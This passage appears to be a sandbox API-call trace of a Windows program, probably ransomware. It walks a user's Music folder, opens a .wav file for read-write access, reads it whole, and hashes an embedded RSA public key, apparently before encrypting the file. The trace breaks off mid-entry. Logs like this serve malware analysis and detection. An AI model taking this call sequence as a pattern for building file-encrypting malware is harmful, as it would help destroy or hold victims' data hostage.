[0195.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.134] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\") returned="5U0VVnc3NrOc8n_Z\\" [0195.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2338 [0195.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.134] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0195.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2338 | out: hHeap=0x2c0000) returned 1 [0195.135] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.135] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.136] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.136] PathFindFileNameW (pszPath="") returned="" [0195.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.136] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\*" (normalized: "c:\\users\\keecfmwgj\\music\\5u0vvnc3nroc8n_z\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49396f90, ftCreationTime.dwHighDateTime=0x1d8a10c, ftLastAccessTime.dwLowDateTime=0x2809600, ftLastAccessTime.dwHighDateTime=0x1d8a11b, ftLastWriteTime.dwLowDateTime=0x2809600, ftLastWriteTime.dwHighDateTime=0x1d8a11b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0195.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.139] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49396f90, ftCreationTime.dwHighDateTime=0x1d8a10c, ftLastAccessTime.dwLowDateTime=0x2809600, ftLastAccessTime.dwHighDateTime=0x1d8a11b, ftLastWriteTime.dwLowDateTime=0x2809600, ftLastWriteTime.dwHighDateTime=0x1d8a11b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.139] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c9950, ftCreationTime.dwHighDateTime=0x1d89ed3, ftLastAccessTime.dwLowDateTime=0x85e58bd0, ftLastAccessTime.dwHighDateTime=0x1d8a699, ftLastWriteTime.dwLowDateTime=0x85e58bd0, ftLastWriteTime.dwHighDateTime=0x1d8a699, nFileSizeHigh=0x0, nFileSizeLow=0x17924, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4g2bIkE6.wav", cAlternateFileName="")) returned 1 [0195.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0195.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.139] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\4g2bIkE6.wav") returned=".wav" [0195.139] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\4g2bIkE6.wav" (normalized: "c:\\users\\keecfmwgj\\music\\5u0vvnc3nroc8n_z\\4g2bike6.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.140] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=96548) returned 1 [0195.140] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.144] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x178fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.144] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.147] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.147] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x17924, lpOverlapped=0x0) returned 1 [0195.148] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.148] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.148] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.148] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.149] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.149] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.149] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.150] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.150] GetLastError () returned 0x0 [0195.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.150] GetLastError () returned 0x0 [0195.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.150] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.150] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.151] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.151] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.151] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x17920) returned 0x2af5168 [0195.152] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0195.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2338 [0195.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6398 [0195.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae22f0 [0195.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63b0 [0195.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63e0 [0195.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6440 [0195.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63f8 [0195.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.153] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0195.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0195.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0195.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6440 [0195.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0195.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63f8 [0195.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae63e0 [0195.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0195.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0195.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0195.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0195.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.156] GetCurrentThreadId () returned 0x5d8 [0195.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0195.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae80b8 [0195.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0195.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.156] GetCurrentThreadId () returned 0x5d8 [0195.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0195.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6440 [0195.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63e0 [0195.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0195.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63f8 [0195.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63c8 [0195.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6458 [0195.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0195.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6428 [0195.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6410 [0195.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6470 [0195.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6410 [0195.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0195.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0195.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63e0 [0195.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0195.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0195.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0195.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0195.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0195.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 